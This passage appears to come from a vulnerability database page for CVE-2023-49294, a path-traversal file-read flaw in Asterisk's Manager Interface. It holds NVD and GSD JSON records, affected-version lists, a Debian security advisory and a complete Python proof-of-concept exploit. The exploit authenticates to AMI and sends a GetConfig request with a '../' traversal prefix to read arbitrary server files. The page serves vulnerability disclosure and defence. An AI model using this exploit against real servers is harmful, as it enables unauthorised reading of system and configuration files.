      "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GSD-2023-49294

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-49294

Aliases

CVE-2023-49294

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-49294",
    "id": "GSD-2023-49294"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-49294"
      ],
      "details": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.",
      "id": "GSD-2023-49294",
      "modified": "2023-12-13T01:20:35.204593Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-49294",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "asterisk",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 18.20.1"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 19.0.0, \u003c 20.5.1"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "= 21.0.0"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 18.9-cert6"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "asterisk"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-22",
                "lang": "eng",
                "value": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
            "refsource": "MISC",
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "name": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html",
            "refsource": "MISC",
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-8857-hfmw-vg8f",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
                    "versionEndExcluding": "18.20.1",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
                    "versionEndExcluding": "20.5.1",
                    "versionStartIncluding": "19.0.0",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                    "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                    "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                    "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                    "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                    "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                    "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                    "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                    "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                    "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                    "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                    "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                    "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                    "matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                    "matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                    "matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                    "matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                    "matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                    "matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                    "matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                    "matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                    "matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                    "matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
                    "vulnerable": true
                  },
                  {
                    "criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                    "matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
          },
          {
            "lang": "es",
            "value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema."
          }
        ],
        "id": "CVE-2023-49294",
        "lastModified": "2023-12-29T00:15:49.930",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            },
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "exploitabilityScore": 1.2,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2023-12-14T20:15:52.730",
        "references": [
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Product"
            ],
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Patch"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Vendor Advisory"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-22"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Primary"
          }
        ]
      }
    }
  }
}

VAR-202312-2340

Vulnerability from variot - Updated: 2024-03-30 22:40

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq

Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE-2023-37457

The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.

CVE-2023-38703

PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.

CVE-2023-49786

Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE----- . # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

Date: 2023-03-26

Exploit Author: Sean Pesce

Vendor Homepage: https://asterisk.org/

Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

Version: 18.20.0

Tested on: Debian Linux

CVE: CVE-2023-49294

!/usr/bin/env python3

Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

to the common INI configuration format.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-49294

https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

import argparse import getpass import socket import sys

CVE_ID = 'CVE-2023-49294'

DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB

def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)

def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp

if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()

# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
    args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')

print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)

# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))

# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)

# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
    login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
    print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
    sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)

# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
    'ActionID': args.action_id,
    'Filename': f'{traversal}{args.file}',
    #'Category': 'default',
    #'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
    resp = tcp_send_rcv(sock, b'')

print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')

if b'Error' in resp:
    sys.exit(1)

pass  # Done

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "18.20.1"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "19.0.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "18.9"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "16.8.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "20.5.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "21.0.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "13.13.0"
      },
      {
        "model": "asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "digium",
        "version": null
      },
      {
        "model": "certified asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "sangoma",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
